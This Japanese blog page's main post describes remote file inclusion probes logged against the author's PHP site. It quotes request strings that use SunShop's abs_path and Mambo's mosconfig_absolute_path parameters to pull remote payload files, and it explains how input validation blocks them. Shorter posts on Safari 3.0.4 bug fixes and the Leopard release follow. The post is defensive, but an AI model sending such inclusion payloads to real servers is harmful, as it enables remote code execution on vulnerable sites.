【PHPセキュリティ】引数のチェックは必ず行いましょう!!

低価格+迅速サポートのレンタルサーバ

最近、PHPプログラムへに対する攻撃が増えていると思います。私が管理するプログラムでは、引数に想定外の文字列が渡された場合、私にメールが来るようになっています。以前は、しょうもないロボットが引数なしでアクセスすることが原因で、そのようなメールが来ることがほとんだったのですが、最近は違います。

sunshop//global.php?abs_path=http://****/userimages/id.txt? sunshop/global.php?abs_path=http://****/a/safe.txt?? sunshop/index.php?abs_path=****/alat/cmd? sunshop//index.php?abs_path=http://www.robosborn.com/blog/wp-content/id.txt? sunshop//checkout.php?abs_path=http://*****/blog/wp-content/id.txt?

などという引数が渡されるアクセスが多くなってきました。

http://（私のサーバ名）//mambo_path/administrator/components/com_swmenupro/imagemanager/classes/imagemanager.php?mosconfig_absolute_path=http://*****/test.txt

というようなものも増えてきました。

もちろん、私はPHPプログラムの中で引数のチェック（利用できる文字を制限していますから、「/」「:」などが含まれていれば即アウトにします。）を行っていますから問題はないのですが、何でこういうアクセスがあるのだろうと調べてみました。

「sunshop」と「abs_path」で検索してみると、すぐに見つかります。脆弱性のあるPHPプログラムを利用しているサーバを攻撃するために、手当たり次第にやっているということのようです。

●FrSIRT - Turnkey Web Tools SunShop "abs_path" Parameter Remote File Inclusion Vulnerabilities / Exploit (Security Advisories)
http://www.frsirt.com/english/advisories/2007/1422

同様に、「mambo_path」と「mosconfig_absolute_path」で検索してみると分かります。
●【セキュリティフォーカス】 Mambo SWMenu MosConfig_Absolute_Path Parameter Multiple Remote File Include Vulnerabilities
http://www.securityfocus.com/bid/23116/exploit

そもそも、abs_pathでもabsolute_pathでも絶対パスのようなものを引数で指定できるようにして、かつ、リモートサーバのURLも指定できるようにしてあるなど、そういうPHPプログラムを第三者に配布してはいけないと思うのですが、この作成者はあまりにも考えが足りなかったのでしょう。

ただ、私が検出できたと思っている攻撃も、検出できたからこそ、私に通知メールが届いてるだけで、検出できなかった場合は、分からないのですから、これらの事例を笑ってばかりはいられません。知らない間に、やばいことになっているかもしれないので、怖いです。私は左の書籍「PHPサイバーテロの技法―攻撃と防御の実際」を読んでいるので少しはましでしょうが、もっと勉強しないといけないです。




抜群の検定試験合格率！　日本語教師を育てる実績のプログラム

日本語入力ができるようになったWindows版Safari 3.0.4

Safari 3.0.4がリリースされました。開発者向けに公開されたものですが、無料登録で、Apple Developer Connectionのサイトからダウンロードできます。

リリースノート（英語）には、特定のサイトにおいて不具合が発生するのを修正したなど、細かく書かれていますが、何よりも日本人にとってすばらしいのは、日本語入力ができるようになったことです。また、SSLの証明書が表示されない問題も修正されています。

さらに、このブログで書いてきたSafari3のJavaScript関連の不具合で、Windows版のみに存在する問題のうち、やっと一つだけですが、修正されたものもあります。

● Windows版Safari3β版のalertでは、英数字が一定文字数以上にわたって連続するとalertを正しく表示できない不具合
http://shimax.cocolog-nifty.com/search/2007/06/windowssafari3a_8bfa.html

という問題は、3.0.4で見事に修正されています。ただし、下記の３つの問題はまだ修正されていません。

● Windows版Safari3Betaで、JavaScriptでCtrlキーの取得が出来る時と出来ない時がある理由
http://shimax.cocolog-nifty.com/search/2007/06/windowssafari3b_5b81.html

●Windows版Safari（β版）で、改行を含む文字列をalertで表示させると変になる不具合
http://shimax.cocolog-nifty.com/search/2007/06/windowssafarial_63f5.html

●document.lastModifiedが正しく取得できない問題
http://shimax.cocolog-nifty.com/search/2007/06/windowssafariss_2387.html

Leopardついに発売へ

ここのところ、毎日、Apple社のホームページを見ていて、まだかまだかと思っていたのですが、ついにLeopard登場。やっぱり10月26日発売のようです。やはり発売日は10月26日でした。

Amazonではまだページが更新されていませんが、Amazonでもそのうち注文できるようになるでしょう。